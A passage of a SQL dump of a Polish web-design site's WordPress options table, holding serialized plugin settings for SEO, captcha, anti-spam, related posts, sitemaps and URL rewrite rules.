;a:0:{}s:8:\"interval\";i:936000;}}}s:7:\"version\";i:2;}','yes'),(3491,'secure-wp','a:11:{s:15:\"secure_wp_error\";s:0:\"\";s:17:\"secure_wp_version\";s:1:\"1\";s:23:\"secure_wp_admin_version\";s:1:\"1\";s:15:\"secure_wp_index\";s:1:\"1\";s:13:\"secure_wp_rsd\";s:1:\"1\";s:13:\"secure_wp_wlw\";s:0:\"\";s:13:\"secure_wp_rcu\";s:1:\"1\";s:13:\"secure_wp_rpu\";s:1:\"1\";s:13:\"secure_wp_rtu\";s:1:\"1\";s:13:\"secure_wp_wps\";s:0:\"\";s:16:\"secure_wp_amurlr\";s:1:\"1\";}','yes'),(29599,'_site_transient_timeout_theme_roots','1472742148','yes'),(29600,'_site_transient_theme_roots','a:7:{s:13:\"happy-cyclope\";s:7:\"/themes\";s:6:\"pc-one\";s:7:\"/themes\";s:12:\"twentyeleven\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentyfourteen\";s:7:\"/themes\";s:9:\"twentyten\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}','yes'),(717,'current_theme','pc-one','yes'),(111,'widget_pages','a:3:{i:2;a:0:{}i:3;a:3:{s:5:\"title\";s:0:\"\";s:6:\"sortby\";s:10:\"post_title\";s:7:\"exclude\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_calendar','a:2:{i:2;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_links','a:4:{i:2;a:0:{}i:3;a:5:{s:6:\"images\";i:1;s:4:\"name\";i:1;s:11:\"description\";i:0;s:6:\"rating\";i:0;s:8:\"category\";i:0;}i:4;a:5:{s:6:\"images\";i:1;s:4:\"name\";i:1;s:11:\"description\";i:0;s:6:\"rating\";i:0;s:8:\"category\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_tag_cloud','a:2:{i:2;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_nav_menu','a:2:{i:2;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(116,'dashboard_widget_options','a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:20:\"http://www.pc-one.pl\";s:4:\"link\";s:96:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://www.pc-one.pl/\";s:3:\"url\";s:125:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://pc-one.pl/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}','yes'),(933,'db_upgraded','','yes'),(8389,'auto_core_update_notified','a:4:{s:4:\"type\";s:6:\"manual\";s:5:\"email\";s:19:\"admin@maxserwer.com\";s:7:\"version\";s:5:\"4.5.3\";s:9:\"timestamp\";i:1467017668;}','yes'),(3680,'yarpp_version_info_timeout','1424334412','no'),(3681,'yarpp_version_info','a:3:{s:6:\"result\";s:7:\"newbeta\";s:4:\"beta\";a:2:{s:7:\"version\";s:7:\"4.0.3b4\";s:3:\"url\";s:82:\"http://downloads.wordpress.org/plugin/yet-another-related-posts-plugin.4.0.3b4.zip\";}s:7:\"current\";a:2:{s:7:\"version\";s:5:\"4.0.2\";s:3:\"url\";s:80:\"http://downloads.wordpress.org/plugin/yet-another-related-posts-plugin.4.0.2.zip\";}}','no'),(144,'recently_activated','a:0:{}','yes'),(145,'ftp_credentials','a:3:{s:8:\"hostname\";s:9:\"localhost\";s:8:\"username\";s:8:\"mariopco\";s:15:\"connection_type\";s:3:\"ftp\";}','yes'),(146,'aioseop_options','a:36:{s:9:\"aiosp_can\";s:2:\"on\";s:12:\"aiosp_donate\";N;s:16:\"aiosp_home_title\";s:51:\"Tanie strony internetowe. Pozycjonowanie stron www.\";s:22:\"aiosp_home_description\";s:109:\"Oferty na tworzenie, projekty, wdrożenia portali i serwisów internetowych. Wirtualne biuro tworzenia stron.\";s:19:\"aiosp_home_keywords\";s:62:\"strony,domeny,witryny,sprzedaż,ogłoszenia,projekty,tworzenie\";s:23:\"aiosp_max_words_excerpt\";N;s:20:\"aiosp_rewrite_titles\";s:2:\"on\";s:23:\"aiosp_post_title_format\";s:27:\"%post_title% | %blog_title%\";s:23:\"aiosp_page_title_format\";s:27:\"%page_title% | %blog_title%\";s:27:\"aiosp_category_title_format\";s:31:\"%category_title% | %blog_title%\";s:22:\"aiosp_tag_title_format\";s:20:\"%tag% | %blog_title%\";s:25:\"aiosp_search_title_format\";s:23:\"%search% | %blog_title%\";s:24:\"aiosp_description_format\";s:13:\"%description%\";s:22:\"aiosp_404_title_format\";s:33:\"Nothing found for %request_words%\";s:18:\"aiosp_paged_format\";s:14:\" - Part %page%\";s:20:\"aiosp_use_categories\";N;s:32:\"aiosp_dynamic_postspage_keywords\";s:2:\"on\";s:22:\"aiosp_category_noindex\";s:2:\"on\";s:18:\"aiosp_tags_noindex\";N;s:14:\"aiosp_cap_cats\";s:2:\"on\";s:27:\"aiosp_generate_descriptions\";N;s:16:\"aiosp_debug_info\";N;s:20:\"aiosp_post_meta_tags\";s:0:\"\";s:20:\"aiosp_page_meta_tags\";s:0:\"\";s:20:\"aiosp_home_meta_tags\";s:0:\"\";s:13:\"aiosp_enabled\";s:1:\"1\";s:17:\"aiosp_enablecpost\";N;s:26:\"aiosp_use_tags_as_keywords\";s:2:\"on\";s:16:\"aiosp_seopostcol\";N;s:18:\"aiosp_seocustptcol\";N;s:21:\"aiosp_posttypecolumns\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:12:\"aiosp_do_log\";N;s:14:\"aiosp_ex_pages\";s:0:\"\";s:28:\"aiosp_archive_author_noindex\";s:2:\"on\";s:26:\"aiosp_archive_date_noindex\";s:2:\"on\";s:23:\"aiosp_date_title_format\";s:21:\"%date% | %blog_title%\";}','yes'),(147,'ddsg_language','English','yes'),(148,'ddsg_items_per_page','50','yes'),(149,'ddsg_sm_name','','yes'),(150,'ddsg_what_to_show','both','yes'),(151,'ddsg_which_first','posts','yes'),(152,'ddsg_post_sort_order','title','yes'),(153,'ddsg_page_sort_order','title','yes'),(154,'ddsg_comments_on_posts','','yes'),(155,'ddsg_comments_on_pages','','yes'),(156,'ddsg_show_zero_comments','','yes'),(157,'ddsg_hide_future','','yes'),(158,'ddsg_new_window','','yes'),(159,'ddsg_show_post_date','','yes'),(160,'ddsg_show_page_date','','yes'),(161,'ddsg_date_format','F jS, Y','yes'),(162,'ddsg_hide_protected','1','yes'),(163,'ddsg_excluded_cats','','yes'),(164,'ddsg_excluded_pages','','yes'),(165,'ddsg_page_nav','1','yes'),(166,'ddsg_page_nav_where','top','yes'),(167,'ddsg_xml_path','','yes'),(168,'ddsg_xml_where','last','yes'),(169,'si_captcha','a:31:{s:18:\"si_captcha_donated\";s:5:\"false\";s:29:\"si_captcha_captcha_difficulty\";s:6:\"medium\";s:15:\"si_captcha_perm\";s:4:\"true\";s:21:\"si_captcha_perm_level\";s:4:\"read\";s:18:\"si_captcha_comment\";s:4:\"true\";s:33:\"si_captcha_comment_label_position\";s:20:\"input-label-required\";s:16:\"si_captcha_login\";s:5:\"false\";s:19:\"si_captcha_register\";s:4:\"true\";s:18:\"si_captcha_lostpwd\";s:4:\"true\";s:20:\"si_captcha_rearrange\";s:5:\"false\";s:26:\"si_captcha_disable_session\";s:4:\"true\";s:23:\"si_captcha_enable_audio\";s:4:\"true\";s:29:\"si_captcha_enable_audio_flash\";s:5:\"false\";s:24:\"si_captcha_captcha_small\";s:5:\"false\";s:19:\"si_captcha_no_trans\";s:5:\"false\";s:24:\"si_captcha_aria_required\";s:5:\"false\";s:25:\"si_captcha_external_style\";s:5:\"false\";s:28:\"si_captcha_captcha_div_style\";s:14:\"display:block;\";s:31:\"si_captcha_captcha_div_style_sm\";s:43:\"width:175px; height:45px; padding-top:10px;\";s:30:\"si_captcha_captcha_div_style_m\";s:43:\"width:250px; height:60px; padding-top:10px;\";s:30:\"si_captcha_captcha_image_style\";s:59:\"border-style:none; margin:0; padding-right:5px; float:left;\";s:28:\"si_captcha_audio_image_style\";s:48:\"border-style:none; margin:0; vertical-align:top;\";s:30:\"si_captcha_refresh_image_style\";s:51:\"border-style:none; margin:0; vertical-align:bottom;\";s:34:\"si_captcha_captcha_input_div_style\";s:52:\"display:block; padding-top:15px; padding-bottom:5px;\";s:30:\"si_captcha_comment_label_style\";s:9:\"margin:0;\";s:30:\"si_captcha_comment_field_style\";s:11:\"width:65px;\";s:24:\"si_captcha_label_captcha\";s:0:\"\";s:29:\"si_captcha_required_indicator\";s:2:\" *\";s:26:\"si_captcha_tooltip_captcha\";s:0:\"\";s:24:\"si_captcha_tooltip_audio\";s:0:\"\";s:26:\"si_captcha_tooltip_refresh\";s:0:\"\";}','yes'),(3481,'uninstall_plugins','a:4:{i:0;b:0;s:39:\"si-captcha-for-wordpress/si-captcha.php\";s:24:\"si_captcha_unset_options\";s:27:\"wp-pagenavi/wp-pagenavi.php\";s:14:\"__return_false\";s:26:\"secure-wordpress/index.php\";a:2:{i:0;s:10:\"SwpaPlugin\";i:1;s:9:\"uninstall\";}}','no'),(171,'pagenavi_options','a:15:{s:10:\"pages_text\";s:36:\"Page %CURRENT_PAGE% of %TOTAL_PAGES%\";s:12:\"current_text\";s:13:\"%PAGE_NUMBER%\";s:9:\"page_text\";s:13:\"%PAGE_NUMBER%\";s:10:\"first_text\";s:13:\"« First\";s:9:\"last_text\";s:12:\"Last »\";s:9:\"prev_text\";s:7:\"«\";s:9:\"next_text\";s:7:\"»\";s:12:\"dotleft_text\";s:3:\"...\";s:13:\"dotright_text\";s:3:\"...\";s:9:\"num_pages\";i:5;s:23:\"num_larger_page_numbers\";i:3;s:28:\"larger_page_numbers_multiple\";i:10;s:11:\"always_show\";b:0;s:16:\"use_pagenavi_css\";b:1;s:5:\"style\";i:1;}','yes'),(172,'wp_spamfree_version','2.1.1.2','yes'),(173,'spamfree_count','278','yes'),(174,'spamfree_options','a:49:{s:22:\"cookie_validation_name\";s:16:\"qBmgnqiyBBBCryua\";s:21:\"cookie_validation_key\";s:16:\"dfoEcaCdojmvvsnC\";s:24:\"form_validation_field_js\";s:16:\"mbdyuqyidFvpkjAj\";s:22:\"form_validation_key_js\";s:16:\"lCrGbcpdEvnlkaot\";s:24:\"cookie_get_function_name\";s:0:\"\";s:24:\"cookie_set_function_name\";s:0:\"\";s:27:\"cookie_delete_function_name\";s:0:\"\";s:32:\"comment_validation_function_name\";s:0:\"\";s:15:\"last_key_update\";i:1454630011;s:8:\"wp_cache\";i:0;s:14:\"wp_super_cache\";i:0;s:20:\"block_all_trackbacks\";N;s:19:\"block_all_pingbacks\";N;s:21:\"use_alt_cookie_method\";s:2:\"on\";s:26:\"use_alt_cookie_method_only\";N;s:18:\"use_captcha_backup\";i:0;s:26:\"use_trackback_verification\";i:0;s:15:\"comment_logging\";N;s:26:\"comment_logging_start_date\";i:0;s:19:\"comment_logging_all\";N;s:26:\"enhanced_comment_blacklist\";N;s:17:\"allow_proxy_users\";N;s:15:\"hide_extra_data\";N;s:20:\"form_include_website\";i:1;s:20:\"form_require_website\";i:0;s:18:\"form_include_phone\";i:1;s:18:\"form_require_phone\";i:0;s:20:\"form_include_company\";i:0;s:20:\"form_require_company\";i:0;s:27:\"form_include_drop_down_menu\";i:0;s:27:\"form_require_drop_down_menu\";i:0;s:25:\"form_drop_down_menu_title\";s:0:\"\";s:26:\"form_drop_down_menu_item_1\";s:0:\"\";s:26:\"form_drop_down_menu_item_2\";s:0:\"\";s:26:\"form_drop_down_menu_item_3\";s:0:\"\";s:26:\"form_drop_down_menu_item_4\";s:0:\"\";s:26:\"form_drop_down_menu_item_5\";s:0:\"\";s:26:\"form_drop_down_menu_item_6\";s:0:\"\";s:26:\"form_drop_down_menu_item_7\";s:0:\"\";s:26:\"form_drop_down_menu_item_8\";s:0:\"\";s:26:\"form_drop_down_menu_item_9\";s:0:\"\";s:27:\"form_drop_down_menu_item_10\";s:0:\"\";s:18:\"form_message_width\";i:40;s:19:\"form_message_height\";i:10;s:23:\"form_message_min_length\";i:25;s:22:\"form_message_recipient\";s:19:\"admin@maxserwer.com\";s:31:\"form_response_thank_you_message\";s:46:\"Your message was sent successfully. Thank you.\";s:22:\"form_include_user_meta\";i:1;s:19:\"promote_plugin_link\";N;}','yes'),(175,'ossdl_off_cdn_url','http://pc-one.pl','yes'),(176,'ossdl_off_include_dirs','wp-content,wp-includes','yes'),(177,'ossdl_off_exclude','.php','yes'),(178,'ossdl_cname','','yes'),(179,'wypiekacz_min_len','1000','yes'),(180,'wypiekacz_min_len_words','0','yes'),(181,'wypiekacz_max_links','3','yes'),(182,'wypiekacz_min_title_len','5','yes'),(183,'wypiekacz_min_title_len_words','0','yes'),(184,'wypiekacz_max_title_len','80','yes'),(185,'wypiekacz_max_title_len_words','0','yes'),(186,'wypiekacz_use_def_cat','1','yes'),(187,'wypiekacz_min_cats','1','yes'),(188,'wypiekacz_max_cats','3','yes'),(189,'wypiekacz_min_tags','1','yes'),(190,'wypiekacz_max_tags','5','yes'),(191,'wypiekacz_limit_for_all','1','yes'),(192,'wypiekacz_def_title','','yes'),(193,'wypiekacz_def_text','','yes'),(194,'wypiekacz_new_login_email','1','yes'),(195,'wypiekacz_pass_reset_email','1','yes'),(196,'wypiekacz_right_now_stats','1','yes'),(197,'wypiekacz_badwords','a:0:{}','yes'),(198,'wypiekacz_check_badwords_title','0','yes'),(199,'wypiekacz_check_badwords_content','0','yes'),(200,'wypiekacz_goodwords','a:0:{}','yes'),(201,'wypiekacz_enforce_links','0','yes'),(202,'wypiekacz_enforce_title','0','yes'),(203,'wypiekacz_enforce_add_dots','1','yes'),(204,'wypiekacz_enforce_cats','0','yes'),(205,'wypiekacz_enforce_tags','0','yes'),(206,'wypiekacz_allow_skip_rules','1','yes'),(207,'wypiekacz_post_types','a:1:{i:0;s:4:\"post\";}','yes'),(252,'yarpp_version','4.2.4','yes'),(253,'widget_yarpp_widget','a:2:{i:2;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(259,'sm_options','a:51:{s:18:\"sm_b_prio_provider\";s:41:\"GoogleSitemapGeneratorPrioByCountProvider\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_pingmsn\";b:1;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:1;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.59999999999999997779553950749686919152736663818359375;s:15:\"sm_pr_posts_min\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"sm_pr_pages\";d:0.59999999999999997779553950749686919152736663818359375;s:10:\"sm_pr_cats\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_arch\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_auth\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_tags\";d:0.299999999999999988897769753748434595763683319091796875;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";i:1298921575;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";s:20:\"67f1cb3a0a1734a7cf2f\";s:13:\"sm_i_lastping\";i:0;s:16:\"sm_i_supportfeed\";b:1;s:22:\"sm_i_supportfeed_cache\";i:1472259629;}','yes'),(262,'sm_status','O:28:\"GoogleSitemapGeneratorStatus\":34:{s:10:\"_startTime\";d:1309875886.118258953094482421875;s:8:\"_endTime\";d:1309875886.121059894561767578125;s:11:\"_hasChanged\";b:1;s:12:\"_memoryUsage\";i:28573696;s:9:\"_lastPost\";i:0;s:9:\"_lastTime\";i:0;s:8:\"_usedXml\";b:1;s:11:\"_xmlSuccess\";b:0;s:8:\"_xmlPath\";s:34:\"/var/www/pc-one.pl/web/sitemap.xml\";s:7:\"_xmlUrl\";s:28:\"http://pc-one.pl/sitemap.xml\";s:8:\"_usedZip\";b:1;s:11:\"_zipSuccess\";b:0;s:8:\"_zipPath\";s:37:\"/var/www/pc-one.pl/web/sitemap.xml.gz\";s:7:\"_zipUrl\";s:31:\"http://pc-one.pl/sitemap.xml.gz\";s:11:\"_usedGoogle\";b:0;s:10:\"_googleUrl\";s:0:\"\";s:15:\"_gooogleSuccess\";b:0;s:16:\"_googleStartTime\";i:0;s:14:\"_googleEndTime\";i:0;s:10:\"_usedYahoo\";b:0;s:9:\"_yahooUrl\";s:0:\"\";s:13:\"_yahooSuccess\";b:0;s:15:\"_yahooStartTime\";i:0;s:13:\"_yahooEndTime\";i:0;s:8:\"_usedAsk\";b:0;s:7:\"_askUrl\";s:0:\"\";s:11:\"_askSuccess\";b:0;s:13:\"_askStartTime\";i:0;s:11:\"_askEndTime\";i:0;s:8:\"_usedMsn\";b:0;s:7:\"_msnUrl\";s:0:\"\";s:11:\"_msnSuccess\";b:0;s:13:\"_msnStartTime\";i:0;s:11:\"_msnEndTime\";i:0;}','no'),(260,'theme_mods_twentyten','a:1:{s:12:\"header_image\";s:68:\"http://pc-one.pl/wp-content/themes/twentyten/images/headers/fern.jpg\";}','yes'),(261,'widget_logic','a:5:{s:6:\"text-3\";s:0:\"\";s:7:\"links-3\";s:0:\"\";s:7:\"links-4\";s:9:\"is_home()\";s:7:\"pages-3\";s:0:\"\";s:6:\"text-4\";s:9:\"is_home()\";}','yes'),(299,'category_children','a:0:{}','yes'),(3480,'initial_db_version','18226','yes'),(718,'theme_mods_pc-one','a:1:{i:0;b:0;}','yes'),(3485,'statpress_collectloggeduser','','yes'),(3486,'statpress_autodelete','1 month','yes'),(3644,'link_manager_enabled','1','yes'),(3487,'statpress_daysinoverviewgraph','7','yes'),(3488,'statpress_mincap','switch_themes','yes'),(3489,'statpress_donotcollectspider','','yes'),(3490,'statpress_autodelete_spider','1 week','yes'),(3492,'yarpp','a:46:{s:9:\"threshold\";i:5;s:5:\"limit\";i:5;s:14:\"excerpt_length\";i:10;s:6:\"recent\";b:0;s:12:\"before_title\";s:4:\"
  • \";s:11:\"after_title\";s:5:\"
  • \";s:11:\"before_post\";s:8:\" \";s:10:\"after_post\";s:8:\"\";s:14:\"before_related\";s:25:\"

    Related posts:

      \";s:13:\"after_related\";s:5:\"
    \";s:10:\"no_results\";s:24:\"

    No related posts.

    \";s:5:\"order\";s:10:\"score DESC\";s:9:\"rss_limit\";i:3;s:18:\"rss_excerpt_length\";i:10;s:16:\"rss_before_title\";s:4:\"
  • \";s:15:\"rss_after_title\";s:5:\"
  • \";s:15:\"rss_before_post\";s:8:\" \";s:14:\"rss_after_post\";s:8:\"\";s:18:\"rss_before_related\";s:21:\"

    Related posts:

      \";s:17:\"rss_after_related\";s:9:\"

    \";s:14:\"rss_no_results\";s:24:\"

    No related posts.

    \";s:9:\"rss_order\";s:10:\"score DESC\";s:9:\"past_only\";b:1;s:12:\"show_excerpt\";b:0;s:16:\"rss_show_excerpt\";b:0;s:8:\"template\";b:0;s:12:\"rss_template\";b:0;s:14:\"show_pass_post\";b:0;s:12:\"cross_relate\";b:0;s:11:\"rss_display\";b:0;s:19:\"rss_excerpt_display\";b:1;s:13:\"promote_yarpp\";b:0;s:17:\"rss_promote_yarpp\";b:0;s:15:\"myisam_override\";b:0;s:7:\"exclude\";s:0:\"\";s:6:\"weight\";a:3:{s:5:\"title\";i:1;s:4:\"body\";i:1;s:3:\"tax\";a:2:{s:8:\"post_tag\";i:1;s:8:\"category\";i:1;}}s:11:\"require_tax\";a:0:{}s:5:\"optin\";b:0;s:18:\"thumbnails_heading\";s:14:\"Related posts:\";s:18:\"thumbnails_default\";s:84:\"http://www.pc-one.pl/wp-content/plugins/yet-another-related-posts-plugin/default.png\";s:22:\"rss_thumbnails_heading\";s:14:\"Related posts:\";s:22:\"rss_thumbnails_default\";s:84:\"http://www.pc-one.pl/wp-content/plugins/yet-another-related-posts-plugin/default.png\";s:12:\"display_code\";b:0;s:20:\"auto_display_archive\";b:0;s:23:\"auto_display_post_types\";a:1:{i:0;s:4:\"post\";}s:5:\"pools\";a:0:{}}','yes'),(13815,'yarpp_pro','a:7:{s:6:\"active\";s:1:\"0\";s:3:\"aid\";N;s:2:\"st\";N;s:1:\"v\";N;s:4:\"dpid\";N;s:5:\"optin\";b:0;s:23:\"auto_display_post_types\";a:1:{i:0;s:4:\"post\";}}','yes'),(17464,'rewrite_rules','a:72:{s:34:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml$\";s:40:\"index.php?xml_sitemap=params=$matches[2]\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml\\.gz$\";s:49:\"index.php?xml_sitemap=params=$matches[2];zip=true\";s:35:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html$\";s:50:\"index.php?xml_sitemap=params=$matches[2];html=true\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html.gz$\";s:59:\"index.php?xml_sitemap=params=$matches[2];html=true;zip=true\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1